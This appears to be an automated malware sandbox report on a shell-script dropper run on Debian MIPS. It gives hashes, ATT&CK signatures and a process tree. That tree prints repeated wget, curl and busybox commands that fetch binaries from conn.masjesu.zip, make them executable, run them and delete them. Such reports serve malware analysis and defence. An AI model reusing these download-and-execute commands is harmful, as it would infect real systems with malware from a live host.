Analysis
-
max time kernel
149s -
max time network
63s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28/10/2024, 02:22
Static task
static1
Behavioral task
behavioral1
Sample
376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh
-
Size
10KB
-
MD5
9b934eb9471f7b80ea070ae4feb86150
-
SHA1
9303ecd0d513c8024a554bf860d73fe5f98cce23
-
SHA256
376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e
-
SHA512
e8b3fe4c18b161c588b07657e1609be4c3ad94a1fced10b0c828730ffb4079962bb6d7a1067c57666d9bcab83cbb6795e263783c41f9ab8aecca55f2f6ea4c83
-
SSDEEP
96:YrHTrLtXVtIgNNNNNSVBxLQMs1VZ1Vx1VAVhVlV4/T8hZcL3LlLCakqz6LUY7tNN:k2y1pifn2FXeDiY1pifn23
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 19 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 884 chmod 736 chmod 781 chmod 826 chmod 847 chmod 933 chmod 816 chmod 905 chmod 912 chmod 919 chmod 752 chmod 809 chmod 877 chmod 940 chmod 926 chmod 743 chmod 870 chmod 891 chmod 898 chmod -
Executes dropped EXE 19 IoCs
ioc pid Process /tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP 737 hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP /tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO 744 YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO /tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo 753 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo /tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r 782 TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r /tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh 810 BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh /tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 817 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 /tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu 827 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu /tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo 848 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo /tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O 871 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O /tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo 878 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo /tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh 885 nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh /tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 892 nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 /tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq 899 JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq /tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H 906 T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H /tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 913 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 /tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu 920 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu /tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo 927 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo /tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O 934 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O /tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo 941 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 59 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 830 curl 936 wget 735 busybox 852 wget 944 curl 786 wget 740 curl 819 wget 895 curl 904 busybox 724 curl 915 wget 943 wget 897 busybox 806 busybox 820 curl 901 wget 902 curl 911 busybox 768 curl 747 curl 775 busybox 813 curl 742 busybox 829 wget 757 wget 888 curl 825 busybox 749 busybox 815 busybox 867 curl 873 wget 799 curl 894 wget 908 wget 916 curl 883 busybox 812 wget 869 busybox 746 wget 876 busybox 880 wget 909 curl 918 busybox 922 wget 929 wget 932 busybox 874 curl 937 curl 739 wget 838 busybox 887 wget 890 busybox 923 curl 925 busybox 939 busybox 707 wget 930 curl 881 curl -
Writes file to tmp directory 19 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh curl File opened for modification /tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H curl File opened for modification /tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O curl File opened for modification /tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 curl File opened for modification /tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP curl File opened for modification /tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO curl File opened for modification /tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo curl File opened for modification /tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r curl File opened for modification /tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 curl File opened for modification /tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu curl File opened for modification /tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh curl File opened for modification /tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq curl File opened for modification /tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu curl File opened for modification /tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo curl File opened for modification /tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo curl File opened for modification /tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O curl File opened for modification /tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo curl File opened for modification /tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 curl File opened for modification /tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo curl
Processes
-
/tmp/376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh/tmp/376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:705
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- System Network Configuration Discovery
PID:707
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:724
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- System Network Configuration Discovery
PID:735
-
-
/bin/chmodchmod 777 hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP./hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Executes dropped EXE
PID:737
-
-
/bin/rmrm hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:738
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- System Network Configuration Discovery
PID:739
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- System Network Configuration Discovery
PID:742
-
-
/bin/chmodchmod 777 YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO./YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:745
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- System Network Configuration Discovery
PID:746
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- System Network Configuration Discovery
PID:749
-
-
/bin/chmodchmod 777 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo./GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:756
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- System Network Configuration Discovery
PID:757
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:768
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- System Network Configuration Discovery
PID:775
-
-
/bin/chmodchmod 777 TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r./TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Executes dropped EXE
PID:782
-
-
/bin/rmrm TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:785
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- System Network Configuration Discovery
PID:786
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- System Network Configuration Discovery
PID:806
-
-
/bin/chmodchmod 777 BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh./BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:811
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- System Network Configuration Discovery
PID:812
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- System Network Configuration Discovery
PID:815
-
-
/bin/chmodchmod 777 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2./8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:818
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- System Network Configuration Discovery
PID:819
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- System Network Configuration Discovery
PID:825
-
-
/bin/chmodchmod 777 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu./ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:828
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- System Network Configuration Discovery
PID:829
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- System Network Configuration Discovery
PID:838
-
-
/bin/chmodchmod 777 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo./TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:851
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- System Network Configuration Discovery
PID:852
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- System Network Configuration Discovery
PID:869
-
-
/bin/chmodchmod 777 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O./nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:872
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- System Network Configuration Discovery
PID:873
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- System Network Configuration Discovery
PID:876
-
-
/bin/chmodchmod 777 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo./78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:879
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- System Network Configuration Discovery
PID:880
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- System Network Configuration Discovery
PID:883
-
-
/bin/chmodchmod 777 nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh./nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:886
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- System Network Configuration Discovery
PID:887
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- System Network Configuration Discovery
PID:890
-
-
/bin/chmodchmod 777 nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5./nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:893
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- System Network Configuration Discovery
PID:894
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- System Network Configuration Discovery
PID:897
-
-
/bin/chmodchmod 777 JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq./JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:900
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- System Network Configuration Discovery
PID:901
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- System Network Configuration Discovery
PID:904
-
-
/bin/chmodchmod 777 T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H./T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:907
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- System Network Configuration Discovery
PID:908
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- System Network Configuration Discovery
PID:911
-
-
/bin/chmodchmod 777 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2./8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:914
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- System Network Configuration Discovery
PID:915
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- System Network Configuration Discovery
PID:918
-
-
/bin/chmodchmod 777 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu./ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:921
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- System Network Configuration Discovery
PID:922
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- System Network Configuration Discovery
PID:925
-
-
/bin/chmodchmod 777 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo./TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:928
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- System Network Configuration Discovery
PID:929
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- System Network Configuration Discovery
PID:932
-
-
/bin/chmodchmod 777 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O./nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:935
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- System Network Configuration Discovery
PID:936
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- System Network Configuration Discovery
PID:939
-
-
/bin/chmodchmod 777 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo./GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:942
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- System Network Configuration Discovery
PID:943
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:944
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97